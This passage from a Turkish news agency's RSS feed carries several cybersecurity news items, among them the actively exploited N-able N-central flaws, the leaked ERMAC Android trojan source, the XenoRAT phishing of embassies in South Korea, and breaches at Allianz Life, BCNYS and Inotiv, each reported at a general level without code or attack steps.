<p data-start="1967" data-end="2156"><strong data-start="1967" data-end="1979"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>800’den fazla N-able N-central sunucusu kritik güvenlik açıklarına karşı yamalanmadı, aktif olarak istismar ediliyor</title>
            <link>https://cumha.com.tr/800den-fazla-n-able-n-central-sunucusu-kritik-guvenlik-aciklarina-karsi-yamalanmadi-aktif-olarak-istismar-ediliyor</link>
            <guid>https://cumha.com.tr/800den-fazla-n-able-n-central-sunucusu-kritik-guvenlik-aciklarina-karsi-yamalanmadi-aktif-olarak-istismar-ediliyor</guid>
            <description><![CDATA[ Yönetilen hizmet sağlayıcılar ve IT ekipleri tarafından kullanılan N-able N-central yazılımındaki iki kritik güvenlik açığının aktif olarak sömürüldüğü doğrulandı. Yamalar yayımlanmasına rağmen hâlâ 800’den fazla sunucu korunmasız durumda. ABD’deki federal kurumlara sistemlerini 20 Ağustos’a kadar güncelleme zorunluluğu getirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59bac12e2a.webp" length="61076" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:01:05 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="509" data-end="865">Popüler ağ yönetim platformu N-able N-central’da keşfedilen iki kritik güvenlik açığı, dünya genelinde yüzlerce sunucuyu risk altında bırakıyor. CVE-2025-8875 ve CVE-2025-8876 olarak takip edilen açıklar, kimliği doğrulanmış saldırganların komut enjeksiyonu yapmasına ve güvenli olmayan serileştirme zafiyeti üzerinden komut çalıştırmasına imkân tanıyor.</p>
<p data-start="867" data-end="1165"><strong data-start="867" data-end="888">Durumun ciddiyeti</strong><br data-start="888" data-end="891">N-able, açıkların yamalandığını ve 2025.3.1 sürümüyle kapatıldığını duyurdu. Ancak Shadowserver Foundation verilerine göre hâlâ 880 sunucu güncellenmedi. Çoğu ABD, Kanada ve Hollanda’da bulunuyor. Shodan aramalarında internete açık yaklaşık 2.000 N-central örneği görüldü.</p>
<p data-start="1167" data-end="1345">N-able, yaptığı açıklamada güvenlik ihlallerinin yalnızca sınırlı sayıda şirket içi ortamda gözlemlendiğini, kendi bulut ortamlarında ise istismar tespit edilmediğini bildirdi.</p>
<p data-start="1347" data-end="1666"><strong data-start="1347" data-end="1375">CISA’dan zorunlu talimat</strong><br data-start="1375" data-end="1378">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), açıkları “bilinen istismar edilen güvenlik açıkları” listesine ekledi. Federal kurumların, özellikle İç Güvenlik Bakanlığı, Hazine Bakanlığı ve Enerji Bakanlığı’nın sistemlerini 20 Ağustos’a kadar yamalaması zorunlu hale getirildi.</p>
<p data-start="1668" data-end="1965">CISA, özel sektör kuruluşlarına doğrudan yükümlülük getirmese de tüm ağ yöneticilerini N-able’ın yayımladığı yamaları uygulamaya, aksi halde ürünü devre dışı bırakmaya çağırdı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olmaya devam ediyor” denildi.</p>
<p data-start="1967" data-end="2205"><strong data-start="1967" data-end="1979"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İngiltere’de 3.000’den fazla siteyi hacklediğini iddia eden kişiye 20 ay hapis cezası</title>
            <link>https://cumha.com.tr/ingilterede-3000den-fazla-siteyi-hackledigini-iddia-eden-kisiye-20-ay-hapis-cezasi</link>
            <guid>https://cumha.com.tr/ingilterede-3000den-fazla-siteyi-hackledigini-iddia-eden-kisiye-20-ay-hapis-cezasi</guid>
            <description><![CDATA[ Rotherham kentinde yaşayan 26 yaşındaki Al-Tahery Al-Mashriky, hükümet siteleri ve haber kuruluşları dahil çok sayıda web sitesini hacklediği, milyonlarca Facebook kullanıcısının verilerini çaldığı ve çeşitli platformlardan kimlik bilgileri elde ettiği suçlamalarını kabul ederek 20 ay hapis cezasına çarptırıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59b9fa4712.webp" length="36238" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:01:03 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="459" data-end="638">İngiltere’de 26 yaşındaki Al-Tahery Al-Mashriky, binlerce web sitesine saldırdığı ve milyonlarca kişiye ait bilgileri çaldığı suçlamalarını kabul ederek 20 ay hapis cezası aldı.</p>
<p data-start="640" data-end="1024"><strong data-start="640" data-end="665">Soruşturmanın geçmişi</strong><br data-start="665" data-end="668">Mashriky, 2022 yılında ABD kolluk kuvvetlerinden gelen bilgiler doğrultusunda İngiltere’de tutuklandı. Mart 2025’te görülen davada suçunu kabul ederek dokuz suçtan hüküm giydi. Suçlamalar arasında Facebook kullanıcılarına ait milyonlarca giriş bilgisinin çalınması, Yemen hükümeti ve İsrail merkezli bir haber sitesi gibi kurumların hacklenmesi yer aldı.</p>
<p data-start="1026" data-end="1425"><strong data-start="1026" data-end="1051">Hedef alınan kurumlar</strong><br data-start="1051" data-end="1054">Adli incelemeler, Yemen Dışişleri Bakanlığı ve Yemen Güvenlik Medya Bakanlığı’nın sitelerine sızıldığını ve bu sitelerde kullanıcı adı tarama araçları yerleştirildiğini ortaya koydu. Ayrıca İsrail’deki <em data-start="1256" data-end="1267">Live News</em> sitesinin yönetici sayfalarına erişildi ve tüm içerik indirildi. ABD ve Kanada’daki dini kuruluşlar ile Kaliforniya Su Kurulu da hedefler arasında bulundu.</p>
<p data-start="1427" data-end="1686"><strong data-start="1427" data-end="1446">Çalınan veriler</strong><br data-start="1446" data-end="1449">Mashriky’nin elinde 4 milyondan fazla Facebook kullanıcısına ait veriler, ayrıca Netflix ve PayPal gibi hizmetlere ait çalıntı kullanıcı bilgileri bulundu. Saldırıların bazılarında web siteleri siyasi ve dini içeriklerle tahrif edildi.</p>
<p data-start="1688" data-end="2035"><strong data-start="1688" data-end="1720">Ulusal Suç Ajansı açıklaması</strong><br data-start="1720" data-end="1723">İngiltere Ulusal Suç Ajansı (NCA) Siber Suç Birimi Başkanı Paul Foster, Mashriky’nin saldırılarının büyük ölçüde kesinti yarattığını belirterek, “Bu saldırılar yalnızca siyasi ve ideolojik mesaj yaymak için yapıldı. Ayrıca milyonlarca kişiyi dolandırmaya imkân sağlayacak kişisel verileri de ele geçirdi” dedi.</p>
<p data-start="2037" data-end="2240"><strong data-start="2037" data-end="2049"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ERMAC Android bankacılık truva atının kaynak kodu sızdı, altyapısı ve işleyişi açığa çıktı</title>
            <link>https://cumha.com.tr/ermac-android-bankacilik-truva-atinin-kaynak-kodu-sizdi-altyapisi-ve-isleyisi-aciga-cikti</link>
            <guid>https://cumha.com.tr/ermac-android-bankacilik-truva-atinin-kaynak-kodu-sizdi-altyapisi-ve-isleyisi-aciga-cikti</guid>
            <description><![CDATA[ Hunt.io araştırmacıları, Mart 2024’te açık bir dizinde keşfettikleri “Ermac 3.0.zip” arşivinde Android tabanlı ERMAC zararlı yazılımının kaynak kodunu buldu. Kod sızıntısı, 700’den fazla uygulamayı hedef alan özelliklerin yanı sıra komuta-kontrol altyapısını, operatör panelini ve trojan oluşturucusunu ortaya çıkardı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59b9358f41.webp" length="41552" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:01:00 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="469" data-end="766">Android cihazları hedef alan ERMAC bankacılık truva atının 3. sürümüne ait kaynak kod çevrimiçi ortamda sızdırıldı. Hunt.io araştırmacıları, 2024 yılı Mart ayında yaptıkları taramalar sırasında açık bırakılmış bir dizinde buldukları arşivi inceleyerek zararlı yazılımın işleyişini açığa çıkardı.</p>
<p data-start="768" data-end="1100"><strong data-start="768" data-end="790">Sızıntının içeriği</strong><br data-start="790" data-end="793">Arşivde zararlının PHP tabanlı komuta-kontrol altyapısı, React ile hazırlanmış operatör paneli, Go dilinde yazılmış veri sızdırma sunucusu, Kotlin tabanlı arka kapı ve özelleştirilmiş APK üreticisi yer aldı. Analizler, ERMAC 3.0’ın önceki sürümlere kıyasla kapsamını önemli ölçüde genişlettiğini gösterdi.</p>
<p data-start="1102" data-end="1598"><strong data-start="1102" data-end="1128">Hedefler ve yetenekler</strong><br data-start="1128" data-end="1131">ERMAC’ın yeni sürümü, bankacılık, alışveriş ve kripto para uygulamaları dahil olmak üzere 700’den fazla mobil uygulamayı hedefliyor. Zararlı yazılım; SMS, kişi listesi ve hesap bilgilerini çalabiliyor, Gmail içeriklerine erişebiliyor, sahte bildirimler gösterebiliyor, cihaz kamerasıyla fotoğraf çekebiliyor ve uzaktan uygulama yönetimi yapabiliyor. Ayrıca, cihazdan dosya indirme, çağrı yönlendirme ve SMS gönderme gibi iletişim suiistimali özelliklerine de sahip.</p>
<p data-start="1600" data-end="1967"><strong data-start="1600" data-end="1623">Altyapı zafiyetleri</strong><br data-start="1623" data-end="1626">Hunt.io, sızıntı sayesinde ERMAC’ın canlı komuta-kontrol sunucularını ve operatör panellerini tespit etti. İncelemelerde sabitlenmiş JWT tokenleri, varsayılan kök kullanıcı bilgileri ve korumasız yönetim panelleri gibi ciddi güvenlik açıkları bulundu. Bu durum, altyapının dışarıdan erişime ve manipülasyona açık hale gelmesine neden oldu.</p>
<p data-start="1969" data-end="2347"><strong data-start="1969" data-end="1986">Olası etkiler</strong><br data-start="1986" data-end="1989">Kaynak kod sızıntısının, ERMAC’ı “hizmet olarak kötü amaçlı yazılım” (MaaS) modelinde kullanan suçluların güvenini zedelemesi bekleniyor. Güvenlik çözümlerinin ERMAC’ı daha iyi tespit etmesi mümkün olsa da, kodun diğer tehdit aktörlerinin eline geçmesi durumunda daha gelişmiş ve tespit edilmesi zor yeni varyantların ortaya çıkabileceği değerlendiriliyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Nebraska’da bir kişi 3,5 milyon dolarlık kripto madenciliği dolandırıcılığından 1 yıl hapis cezası aldı</title>
            <link>https://cumha.com.tr/nebraskada-bir-kisi-35-milyon-dolarlik-kripto-madenciligi-dolandiriciligindan-1-yil-hapis-cezasi-aldi</link>
            <guid>https://cumha.com.tr/nebraskada-bir-kisi-35-milyon-dolarlik-kripto-madenciligi-dolandiriciligindan-1-yil-hapis-cezasi-aldi</guid>
            <description><![CDATA[ Nebraska’da yaşayan Charles O. Parks III, bulut bilişim sağlayıcılarını 3,5 milyon dolar dolandırarak yasa dışı kripto madenciliği yaptığı gerekçesiyle 1 yıl hapis cezasına çarptırıldı. Parks, sahte şirketler üzerinden bulut sistemlerinden ücretsiz işlem gücü elde ederek Monero, Ether ve Litecoin üretti, gelirlerini ise lüks araç, mücevher ve seyahatlere harcadı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59b870ecdb.webp" length="60748" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:00:58 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="529" data-end="826">ABD’nin Nebraska eyaletinde yaşayan Charles O. Parks III, “CP3O” takma adıyla yürüttüğü kripto madenciliği operasyonu nedeniyle 1 yıl hapis cezasına mahkum edildi. Parks, iki büyük bulut bilişim sağlayıcısını 3,5 milyon dolar dolandırarak yaklaşık 1 milyon dolar değerinde kripto para elde etti.</p>
<p data-start="828" data-end="1307"><strong data-start="828" data-end="854">Dolandırıcılık yöntemi</strong><br data-start="854" data-end="857">Savcılık belgelerine göre Parks, “CP3O LLC” ve “MultiMillionaire LLC” gibi sahte şirketler kurarak Microsoft ve Amazon merkezli bulut hizmet sağlayıcıları da kapsayan platformlardan yüksek seviyeli işlem gücü aldı. Ocak–Ağustos 2021 arasında faturaları ödemeyerek sağlayıcıların dikkatini farklı bahanelerle dağıttı. Bir şirket yetkililerine, küresel bir çevrimiçi eğitim platformu kurduğunu ve 10 bin öğrenciye hizmet vermeyi planladığını söyledi.</p>
<p data-start="1309" data-end="1697"><strong data-start="1309" data-end="1351">Kripto madenciliği ve kara para aklama</strong><br data-start="1351" data-end="1354">Elde ettiği işlem gücüyle Monero (XMR), Ether (ETH) ve Litecoin (LTC) üreten Parks, kripto varlıklarını çeşitli borsalar, çevrimiçi ödeme hizmetleri, New York merkezli bir NFT pazarı ve banka hesapları üzerinden akladı. Tüm varlıkları nakde çevirerek lüks bir Mercedes-Benz S AMG otomobil, mücevherler ve birinci sınıf seyahatler satın aldı.</p>
<p data-start="1699" data-end="2046"><strong data-start="1699" data-end="1724">Kamuoyuna yansımaları</strong><br data-start="1724" data-end="1727">Savcılık açıklamasında Parks’ın kendisini kripto alanında “inovatif bir düşünce lideri” gibi gösterdiği, ancak gerçekte “yalnızca bir dolandırıcı” olduğu ifade edildi. Parks’ın, 2022’de YouTube kanalında “MultiMillionaire Mentality” başlıklı bir video yayımlayarak sözde zenginlik ipuçlarını paylaştığı da belirtildi.</p>
<p data-start="2048" data-end="2256"><strong data-start="2048" data-end="2060"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>XenoRAT zararlı yazılımı Güney Kore’deki yabancı elçilikleri hedef aldı, saldırıların arkasında APT43 şüphesi</title>
            <link>https://cumha.com.tr/xenorat-zararli-yazilimi-guney-koredeki-yabanci-elcilikleri-hedef-aldi-saldirilarin-arkasinda-apt43-suphesi</link>
            <guid>https://cumha.com.tr/xenorat-zararli-yazilimi-guney-koredeki-yabanci-elcilikleri-hedef-aldi-saldirilarin-arkasinda-apt43-suphesi</guid>
            <description><![CDATA[ Trellix araştırmacılarına göre, Mart 2025’ten bu yana Güney Kore’deki yabancı elçiliklere yönelik en az 19 hedefli kimlik avı saldırısında XenoRAT zararlı yazılımı dağıtıldı. Saldırı teknikleri Kuzey Kore bağlantılı APT43 grubunu işaret ederken, zamanlama ve tatil dönemleri Çin merkezli aktörlere ait izler gösteriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59b7a4e9ae.webp" length="40806" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:00:55 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="489" data-end="726">Trellix tarafından yayımlanan rapora göre, devlet destekli olduğu değerlendirilen bir casusluk kampanyası Güney Kore’deki yabancı elçilikleri hedef alıyor. Kampanyada XenoRAT zararlı yazılımı, sahte diplomatik e-postalarla dağıtılıyor.</p>
<p data-start="728" data-end="1043"><strong data-start="728" data-end="754">Çok aşamalı saldırılar</strong><br data-start="754" data-end="757">Saldırılar Mart ayında başladı ve halen devam ediyor. İlk olarak Orta Avrupa’daki bir elçilik hedef alınırken, Mayıs ayında Batı Avrupa elçiliklerine sahte toplantı davetleri gönderildi. Haziran ve Temmuz aylarında ise ABD–Kore askeri iş birliği temalı oltalama e-postaları öne çıktı.</p>
<p data-start="1045" data-end="1319">E-postalar, diplomat kimliğine bürünerek sahte toplantı davetleri, resmi yazılar ve etkinlik çağrıları şeklinde hazırlandı. İçerikler çok dilli olarak Korece, İngilizce, Fransızca, Arapça, Farsça ve Rusça yazıldı ve çoğu zaman gerçek diplomatik etkinliklerle eşleştirildi.</p>
<p data-start="1321" data-end="1677"><strong data-start="1321" data-end="1349">Zararlı yazılım dağıtımı</strong><br data-start="1349" data-end="1352">Saldırganlar, Dropbox, Google Drive ve Daum gibi servislerde barındırılan parola korumalı ZIP dosyaları kullandı. Dosyalarda PDF gibi görünen LNK dosyaları yer aldı. Bu dosyalar çalıştırıldığında gizlenmiş PowerShell komutları devreye girerek GitHub veya Dropbox’tan XenoRAT yükünü indiriyor ve sistemde kalıcılık sağlıyor.</p>
<p data-start="1679" data-end="1919">XenoRAT, tuş kaydı alma, ekran görüntüsü alma, kamera ve mikrofon erişimi, dosya transferi ve uzaktan komut yürütme gibi özelliklere sahip. Bellekte doğrudan yüklenmesi ve Confuser Core ile gizlenmesi sayesinde tespit edilmesi zorlaşıyor.</p>
<p data-start="1921" data-end="2284"><strong data-start="1921" data-end="1960">Kimin arkasında olduğu tartışılıyor</strong><br data-start="1960" data-end="1963">Saldırılarda kullanılan altyapı ve teknikler, Kuzey Kore bağlantılı Kimsuky (APT43) grubunu işaret ediyor. Ancak saldırıların zamanlaması ve tatil dönemlerindeki duraksamalar Çin takvimine uyum gösteriyor. Bu nedenle Trellix, kampanyayı APT43’e “orta düzey güvenle” atfederek Çin desteği ihtimalini de göz ardı etmiyor.</p>
<p data-start="2286" data-end="2516"><strong data-start="2286" data-end="2298"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Allianz Life veri ihlalinde 1,1 milyon kişinin kişisel bilgileri çalındı</title>
            <link>https://cumha.com.tr/allianz-life-veri-ihlalinde-11-milyon-kisinin-kisisel-bilgileri-calindi</link>
            <guid>https://cumha.com.tr/allianz-life-veri-ihlalinde-11-milyon-kisinin-kisisel-bilgileri-calindi</guid>
            <description><![CDATA[ ABD merkezli sigorta şirketi Allianz Life, Salesforce tabanlı bir veri hırsızlığı saldırısında 1,1 milyon müşterisinin kişisel bilgilerinin ele geçirildiğini açıkladı. ShinyHunters grubu tarafından üstlenilen saldırıda e-posta adresleri, kimlik bilgileri, doğum tarihleri ve iletişim bilgileri sızdırıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59b6da8fa3.webp" length="82224" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:00:52 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="438" data-end="718">ABD’de faaliyet gösteren ve Allianz SE’nin iştiraki olan Allianz Life, Temmuz ayında gerçekleşen büyük çaplı bir veri ihlalini doğruladı. Şirketin 1,4 milyon müşterisinin “çoğunluğunu” etkileyen olayda, 1,1 milyon kişinin kişisel bilgileri saldırganlar tarafından ele geçirildi.</p>
<p data-start="720" data-end="1044"><strong data-start="720" data-end="742">Saldırının yöntemi</strong><br data-start="742" data-end="745">Siber saldırı, 16 Temmuz’da üçüncü taraf bulut tabanlı CRM sistemi Salesforce üzerinden gerçekleştirildi. ShinyHunters grubu, çalışanları kandırarak şirketin Salesforce altyapısına kötü amaçlı bir OAuth uygulaması bağladı. Bu erişim üzerinden müşteri ve iş ortaklarına ait veritabanları indirildi.</p>
<p data-start="1046" data-end="1379"><strong data-start="1046" data-end="1065">Çalınan veriler</strong><br data-start="1065" data-end="1068">Sızdırılan bilgiler arasında ad-soyad, e-posta adresi, cinsiyet, doğum tarihi, telefon numarası ve fiziksel adresler yer alıyor. Bazı dosyalarda vergi kimlik numaraları ve diğer finansal bilgiler de bulundu. Veri ihlali bildirim hizmeti <em data-start="1305" data-end="1324">Have I Been Pwned</em>, toplamda 2,8 milyon kaydın sızdırıldığını açıkladı.</p>
<p data-start="1381" data-end="1658"><strong data-start="1381" data-end="1405">ShinyHunters’ın rolü</strong><br data-start="1405" data-end="1408">ShinyHunters grubu, Allianz Life’ın yanı sıra Google, Adidas, Qantas, Louis Vuitton, Dior, Tiffany &amp; Co., Chanel ve Workday gibi birçok büyük kurumu da hedef aldı. Grup, geçmişte Snowflake, AT&amp;T ve PowerSchool gibi saldırılarla da gündeme gelmişti.</p>
<p data-start="1660" data-end="1920"><strong data-start="1660" data-end="1690">Allianz Life’ın açıklaması</strong><br data-start="1690" data-end="1693">Şirket, devam eden soruşturma nedeniyle ayrıntı veremeyeceğini, ancak bazı çalışanların da veri ihlalinden etkilendiğini doğruladı. Allianz Life, etkilenen müşterilerle iletişime geçtiğini ve incelemelerin sürdüğünü bildirdi.</p>
<p data-start="1922" data-end="2168"><strong data-start="1922" data-end="1934"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>New York İş Konseyi, 47 binden fazla kişiyi etkileyen veri ihlalini açıkladı</title>
            <link>https://cumha.com.tr/new-york-is-konseyi-47-binden-fazla-kisiyi-etkileyen-veri-ihlalini-acikladi</link>
            <guid>https://cumha.com.tr/new-york-is-konseyi-47-binden-fazla-kisiyi-etkileyen-veri-ihlalini-acikladi</guid>
            <description><![CDATA[ New York Eyaleti’nin en büyük işveren derneği olan Business Council of New York State (BCNYS), Şubat ayında gerçekleşen siber saldırıda 47.329 kişinin kişisel, finansal ve sağlık bilgilerinin ele geçirildiğini duyurdu. İhlal altı ay sonra tespit edildi ve etkilenenlere bilgilendirme mektupları gönderilmeye başlandı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59b5e4b3e6.webp" length="74548" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 13:00:50 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="454" data-end="770">Business Council of New York State (BCNYS), Şubat 2025’te yaşanan bir siber saldırının ardından 47 binden fazla kişinin bilgilerinin çalındığını açıkladı. ABD Maine Başsavcılığı’na yapılan resmi bildirimde, saldırganların 24-25 Şubat tarihleri arasında kurumun iç sistemlerine yetkisiz erişim sağladığı belirtildi.</p>
<p data-start="772" data-end="1007"><strong data-start="772" data-end="803">Altı ay sonra tespit edildi</strong><br data-start="803" data-end="806">BCNYS, saldırıyı yaklaşık altı ay sonra, 4 Ağustos’ta fark etti. Yapılan incelemelerde, tehdit aktörlerinin kişisel, finansal ve sağlık bilgilerini içeren dosyalara erişerek kopyaladığı ortaya çıktı.</p>
<p data-start="1009" data-end="1400"><strong data-start="1009" data-end="1028">Çalınan veriler</strong><br data-start="1028" data-end="1031">Etkilenen bilgiler arasında ad-soyad, Sosyal Güvenlik numarası, doğum tarihi, eyalet kimlik numarası, banka ve hesap bilgileri, kredi kartı numarası, PIN kodları, kart son kullanma tarihleri ve vergi mükellefi kimlik numaraları yer alıyor. Ayrıca tıbbi sağlayıcı adı, teşhis ve tedavi bilgileri, reçete bilgileri ve sağlık sigortası verileri de saldırıda ifşa edildi.</p>
<p data-start="1402" data-end="1746"><strong data-start="1402" data-end="1421">Alınan önlemler</strong><br data-start="1421" data-end="1424">BCNYS, olayın ardından dış uzmanlardan destek alarak sistemlerini güvenceye aldığını ve kapsamlı bir soruşturma başlattığını açıkladı. Şimdiye kadar finansal dolandırıcılık veya kimlik hırsızlığına dair kanıt bulunmadığı ifade edildi. Sosyal Güvenlik numarası ifşa olan kişilere ücretsiz kredi izleme hizmeti sağlanacak.</p>
<p data-start="1748" data-end="1875">Kurum, etkilenen bireyleri hesap ekstrelerini ve ücretsiz kredi raporlarını düzenli olarak kontrol etmeleri konusunda uyardı.</p>
<p data-start="1877" data-end="2095"><strong data-start="1877" data-end="1889"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD’li ilaç firması Inotiv, Qilin fidye yazılımı saldırısının işleyişi etkilediğini açıkladı</title>
            <link>https://cumha.com.tr/abdli-ilac-firmasi-inotiv-qilin-fidye-yazilimi-saldirisinin-isleyisi-etkiledigini-acikladi</link>
            <guid>https://cumha.com.tr/abdli-ilac-firmasi-inotiv-qilin-fidye-yazilimi-saldirisinin-isleyisi-etkiledigini-acikladi</guid>
            <description><![CDATA[ Indiana merkezli ilaç araştırma şirketi Inotiv, 8 Ağustos’ta gerçekleşen fidye yazılım saldırısında bazı sistem ve verilerinin şifrelenmesi nedeniyle iş süreçlerinde aksama yaşandığını duyurdu. Qilin grubu saldırının sorumluluğunu üstlenerek 176 GB büyüklüğünde yaklaşık 162 bin dosya çaldığını iddia etti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59a16c0cf7.webp" length="74962" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 12:51:55 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="459" data-end="808">ABD’nin Indiana eyaletinde faaliyet gösteren ilaç şirketi Inotiv, 8 Ağustos 2025’te gerçekleşen bir fidye yazılım saldırısının şirketin operasyonlarını etkilediğini açıkladı. U.S. Securities and Exchange Commission (SEC) başvurusunda paylaşılan bilgilere göre saldırganlar, şirketin bazı sistemlerine yetkisiz erişim sağladı ve verileri şifreledi.</p>
<p data-start="810" data-end="1039"><strong data-start="810" data-end="838">Saldırıyı Qilin üstlendi</strong><br data-start="838" data-end="841">Qilin fidye yazılım grubu, saldırıyı kendi sızıntı sitesinde duyurarak yaklaşık 176 GB büyüklüğünde 162.000 dosyayı ele geçirdiğini öne sürdü. Grup, çaldığı verilerden bazı örnekleri de yayımladı.</p>
<p data-start="1041" data-end="1388"><strong data-start="1041" data-end="1060">Alınan önlemler</strong><br data-start="1060" data-end="1063">Inotiv, olayın ardından harici siber güvenlik uzmanlarıyla birlikte soruşturma başlattı ve kolluk kuvvetlerini bilgilendirdi. Şirketin IT ekibi, etkilenen sistemleri yeniden işler hale getirmek için çalışmalar yürütüyor. Bazı iş süreçleri ise çevrimdışı alternatiflere taşınarak kesintilerin etkisi azaltılmaya çalışılıyor.</p>
<p data-start="1390" data-end="1634">Şirket, saldırının veritabanları ve iş süreçlerinde kullanılan bazı iç uygulamaları etkilediğini, bu nedenle operasyonlarda aksaklıkların bir süre daha devam etmesini beklediklerini duyurdu. Normal işleyişe dönüş için net bir tarih verilmedi.</p>
<p data-start="1636" data-end="1930"><strong data-start="1636" data-end="1655">Inotiv hakkında</strong><br data-start="1655" data-end="1658">Yaklaşık 2.000 kişiyi istihdam eden ve yıllık 500 milyon dolardan fazla gelir elde eden Inotiv, ilaç keşfi, geliştirilmesi, güvenlik değerlendirmesi ve canlı hayvan araştırma modelleri konularında uzmanlaşmış bir sözleşmeli araştırma kuruluşu olarak faaliyet gösteriyor.</p>
<p data-start="1932" data-end="2175"><strong data-start="1932" data-end="1944"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Elastic, Defend EDR ürünü için öne sürülen sıfır gün RCE güvenlik açığı iddialarını reddetti</title>
            <link>https://cumha.com.tr/elastic-defend-edr-urunu-icin-oene-surulen-sifir-gun-rce-guvenlik-acigi-iddialarini-reddetti</link>
            <guid>https://cumha.com.tr/elastic-defend-edr-urunu-icin-oene-surulen-sifir-gun-rce-guvenlik-acigi-iddialarini-reddetti</guid>
            <description><![CDATA[ Elastic, AshES Cybersecurity tarafından yayımlanan ve Defend EDR ürününde uzaktan kod çalıştırmaya imkan veren sıfır gün açığı bulunduğu iddiasını doğrulamadı. Şirket, yaptığı incelemelerde iddiayı destekleyecek kanıtlara rastlamadığını ve araştırmacının tekrarlanabilir bir PoC paylaşmadığını açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59a97b1544.webp" length="46954" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 12:51:51 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="456" data-end="698">Kurumsal arama ve güvenlik şirketi Elastic, Defend EDR ürününde kritik bir sıfır gün güvenlik açığı bulunduğu yönündeki iddiaları reddetti. Açıklama, 16 Ağustos’ta AshES Cybersecurity tarafından yayımlanan bir blog yazısının ardından geldi.</p>
<p data-start="700" data-end="1139"><strong data-start="700" data-end="712">İddialar</strong><br data-start="712" data-end="715">AshES Cybersecurity, Elastic Defend’in <code data-start="754" data-end="783">elastic-endpoint-driver.sys</code> adlı sürücüsünde NULL pointer dereference hatası bulunduğunu, bunun da EDR korumasını atlatmaya, uzaktan kod yürütmeye ve kalıcılık sağlamaya yol açabileceğini öne sürdü. Araştırmacı, kendi hazırladığı sürücü ile bu hatayı tetiklediğini, Windows’un çökmesini ve <code data-start="1046" data-end="1056">calc.exe</code> dosyasının EDR tarafından engellenmeden açılmasını gösteren iki video yayımladı.</p>
<p data-start="1141" data-end="1428"><strong data-start="1141" data-end="1162">Elastic’in yanıtı</strong><br data-start="1162" data-end="1165">Elastic Güvenlik Mühendisliği ekibi, iddiaları inceleyerek rapor edilen açığın yeniden üretilemediğini belirtti. Şirket, AshES tarafından gönderilen raporların tekrarlanabilir bir sömürü kanıtı içermediğini ve araştırmacının PoC paylaşmayı reddettiğini duyurdu.</p>
